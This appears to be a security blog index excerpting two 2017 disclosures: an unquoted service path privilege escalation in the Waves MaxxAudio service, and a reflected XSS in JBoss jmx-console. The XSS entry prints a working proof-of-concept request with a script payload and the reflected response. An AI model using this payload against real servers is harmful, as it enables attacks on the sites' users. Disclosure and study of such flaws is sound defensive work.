Posts

Showing posts from 2017

Unquoted service path local privilege escalation CVE 2017-6005

Image
Waves MaxxAudit when installed adds a windows service with the name "WavesSysSvc". This service has a vulnerability known as Unquoted Service Path. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. Version tested on:

Reflected XSS in jmx-console HtmlAdaptor DatabasePersistencePlugin parameter

Image
1) Description: Jmx-console's DatabasePersistencePlugin parameter in HtmlAdaptor is vulnerable to XSS /jmx-console/HtmlAdaptor?DatabasePersistencePlugin 2) Exploit: ##############Request#################### https://abc.com:8080/jmx-console/HtmlAdaptor?DatabasePersistencePlugin=org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E&name=jboss.ejb%3aservice%3dEJBTimerService%2cpersistencePolicy%3ddatabase&action=updateAttributes&DataSource=jboss.jca%3aservice%3dDataSourceBinding%2cname%3dDefaultDS ############Response##################### .............  <input type="text" name="DatabasePersistencePlugin" value="org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin"><script>alert(1)</script>" > ................ 3) Fixed version: Versions after 4.0.2 are fixed Note: Authenticated access to jmx-console is required to perform XSS